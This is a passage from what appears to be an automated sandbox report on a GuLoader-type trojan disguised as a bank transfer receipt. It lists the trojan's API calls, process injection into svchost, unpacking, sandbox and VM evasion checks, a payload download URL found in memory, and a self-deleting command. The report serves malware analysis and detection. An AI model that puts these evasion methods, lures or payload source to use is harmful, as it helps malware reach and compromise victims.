        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB0A770 NtOpenThread,15_2_1EB0A770
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09770 NtSetInformationFile,15_2_1EB09770
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09760 NtOpenProcess,15_2_1EB09760
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB098A0 NtWriteVirtualMemory,15_2_1EB098A0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09820 NtEnumerateKey,15_2_1EB09820
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB0B040 NtSuspendThread,15_2_1EB0B040
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB095F0 NtQueryInformationFile,15_2_1EB095F0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB099D0 NtCreateProcessEx,15_2_1EB099D0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB095D0 NtClose,15_2_1EB095D0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB0AD30 NtSetContextThread,15_2_1EB0AD30
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09520 NtWaitForSingleObject,15_2_1EB09520
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09560 NtWriteFile,15_2_1EB09560
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB09950 NtQueueApcThread,15_2_1EB09950
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_005279BE LdrInitializeThunk,NtProtectVirtualMemory,15_2_005279BE
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_00527AB1 Sleep,NtProtectVirtualMemory,15_2_00527AB1
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_005279B9 LdrInitializeThunk,NtProtectVirtualMemory,15_2_005279B9
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_00527AE7 NtProtectVirtualMemory,15_2_00527AE7
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69780 NtMapViewOfSection,LdrInitializeThunk,22_2_03A69780
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69FE0 NtCreateMutant,LdrInitializeThunk,22_2_03A69FE0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69710 NtQueryInformationToken,LdrInitializeThunk,22_2_03A69710
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A696E0 NtFreeVirtualMemory,LdrInitializeThunk,22_2_03A696E0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A696D0 NtCreateKey,LdrInitializeThunk,22_2_03A696D0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69660 NtAllocateVirtualMemory,LdrInitializeThunk,22_2_03A69660
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69650 NtQueryValueKey,LdrInitializeThunk,22_2_03A69650
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69A50 NtCreateFile,LdrInitializeThunk,22_2_03A69A50
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A699A0 NtCreateSection,LdrInitializeThunk,22_2_03A699A0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A695D0 NtClose,LdrInitializeThunk,22_2_03A695D0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,22_2_03A69910
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69540 NtReadFile,LdrInitializeThunk,22_2_03A69540
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69860 NtQuerySystemInformation,LdrInitializeThunk,22_2_03A69860
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69840 NtDelayExecution,LdrInitializeThunk,22_2_03A69840
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A697A0 NtUnmapViewOfSection,22_2_03A697A0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A6A3B0 NtGetContextThread,22_2_03A6A3B0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69730 NtQueryVirtualMemory,22_2_03A69730
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69B00 NtSetValueKey,22_2_03A69B00
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A6A710 NtOpenProcessToken,22_2_03A6A710
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69760 NtOpenProcess,22_2_03A69760
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69770 NtSetInformationFile,22_2_03A69770
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A6A770 NtOpenThread,22_2_03A6A770
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69A80 NtOpenDirectoryObject,22_2_03A69A80
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69A20 NtResumeThread,22_2_03A69A20
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69A00 NtProtectVirtualMemory,22_2_03A69A00
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69610 NtEnumerateValueKey,22_2_03A69610
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69A10 NtQuerySection,22_2_03A69A10
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69670 NtQueryInformationProcess,22_2_03A69670
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A695F0 NtQueryInformationFile,22_2_03A695F0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A699D0 NtCreateProcessEx,22_2_03A699D0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69520 NtWaitForSingleObject,22_2_03A69520
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A6AD30 NtSetContextThread,22_2_03A6AD30
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69560 NtWriteFile,22_2_03A69560
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69950 NtQueueApcThread,22_2_03A69950
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A698A0 NtWriteVirtualMemory,22_2_03A698A0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A698F0 NtReadVirtualMemory,22_2_03A698F0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A69820 NtEnumerateKey,22_2_03A69820
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A6B040 NtSuspendThread,22_2_03A6B040
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D38680 NtReadFile,22_2_02D38680
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D387B0 NtAllocateVirtualMemory,22_2_02D387B0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D38700 NtClose,22_2_02D38700
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D385D0 NtCreateFile,22_2_02D385D0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D3867C NtCreateFile,NtReadFile,22_2_02D3867C
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D38622 NtCreateFile,22_2_02D38622
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D387AA NtAllocateVirtualMemory,22_2_02D387AA
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D385CD NtCreateFile,22_2_02D385CD
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 61538 bytes, 1 file
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeProcess Stats: CPU usage > 98%
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeBinary or memory string: OriginalFilename vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000003.294702939.000000000343E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenongrav.exe vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000000.293866460.0000000000F3A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: nongrav.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeMetadefender: Detection: 14%
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeReversingLabs: Detection: 26%
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: unknownProcess created: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe "C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe"
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exeCode function: 0_2_00F31DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00F31DC7
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/1@2/2
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exeCode function: 0_2_00F35849 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00F35849
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exeCode function: 0_2_00F33E45 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00F33E45
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_01
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exeCode function: 0_2_00F34E80 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,0_2_00F34E80
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exeCommand line argument: Kernel32.dll0_2_00F32A7E
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File read: C:\Windows\System32\drivers\etc\hosts
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exeStatic PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: wextract.pdb source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
        Source: Binary string: wntdll.pdbUGP source: nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: nongrav.exe, nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
        Source: Binary string: wextract.pdbPp source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
        Source: Binary string: svchost.pdb source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
        Source: Binary string: svchost.pdbUGP source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp

        Data Obfuscation:

        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Unpacked PE file: 15.2.nongrav.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
        Yara detected GuLoader
        Source: Yara matchFile source: 00000001.00000002.507414765.000000000067A000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exeCode function: 0_2_00F378A1 push ecx; ret 0_2_00F378B4
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 1_2_00405A42 pushad ; iretd 1_2_00405A43
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 1_2_00407418 push esp; ret 1_2_00407419
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 1_2_02AA00C5 push 0000001Ch; ret 1_2_02AA00C7
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 1_2_02AA306C pushfd ; ret 1_2_02AA3073
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 1_2_02AA0043 push 0000001Ch; ret 1_2_02AA0045
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 1_2_02AA23A8 pushfd ; iretd 1_2_02AA23B8
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 1_2_02AA3993 push ebp; retf 1_2_02AA3A08
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 1_2_02AA3397 push eax; retf FA42h1_2_02AA3493
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 1_2_02AA1339 push cs; retf 1_2_02AA133A
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_1EB1D0D1 push ecx; ret 15_2_1EB1D0E4
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_2_00527C89 push es; ret 15_2_00527C8B
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_1_00405A42 pushad ; iretd 15_1_00405A43
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_1_00407418 push esp; ret 15_1_00407419
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeCode function: 15_1_004015E0 push 0051A000h; ret 15_1_004015E5
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03A7D0D1 push ecx; ret 22_2_03A7D0E4
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D3B87C push eax; ret 22_2_02D3B882
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D3B812 push eax; ret 22_2_02D3B818
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D3B81B push eax; ret 22_2_02D3B882
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D3514C push eax; iretd 22_2_02D35156
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D34E06 push EEE5C1DBh; ret 22_2_02D34E0B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D3B7C5 push eax; ret 22_2_02D3B818
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D35F04 push ecx; ret 22_2_02D35F0F
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D2CCA8 push edi; ret 22_2_02D2CCF9
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_02D34405 pushfd ; retf 22_2_02D34406
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exeCode function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00F32DAE
        Source: initial sampleStatic PE information: section name: .text entropy: 7.15232961918
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exeCode function: 0_2_00F31910 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00F31910
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Tries to detect Any.run
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File opened: C:\Program Files\qga\qga.exe
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=
        Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1PQ36FQ9YGHZAM_FHR1D0IRFRVEBW3FSZ
        Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: nongrav.exe, 00000001.00000002.507462728.00000000006DC000.00000004.00000020.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEOWS
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002D28604 second address: 0000000002D2860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002D2898E second address: 0000000002D28994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe TID: 6996 Thread sleep count: 581 > 30
        Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_004088C0 rdtsc 15_2_004088C0
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Window / User API: threadDelayed 581
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F3532F GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00F3532F
        Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F321E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00F321E7
        Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe System information queried: ModuleInformation
        Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
        Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=
        Source: nongrav.exe, 00000001.00000002.507462728.00000000006DC000.00000004.00000020.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeows
        Source: explorer.exe, 00000015.00000000.735601007.000000000EEA7000.00000004.00000001.sdmp Binary or memory string: Prod_VMware_SATA
        Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ
        Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
        Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: explorer.exe, 00000015.00000000.733926654.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
        Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
        Source: explorer.exe, 00000015.00000000.729770363.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
        Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
        Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp Binary or memory string: vmicvss
        Source: explorer.exe, 00000015.00000000.729770363.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
        Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
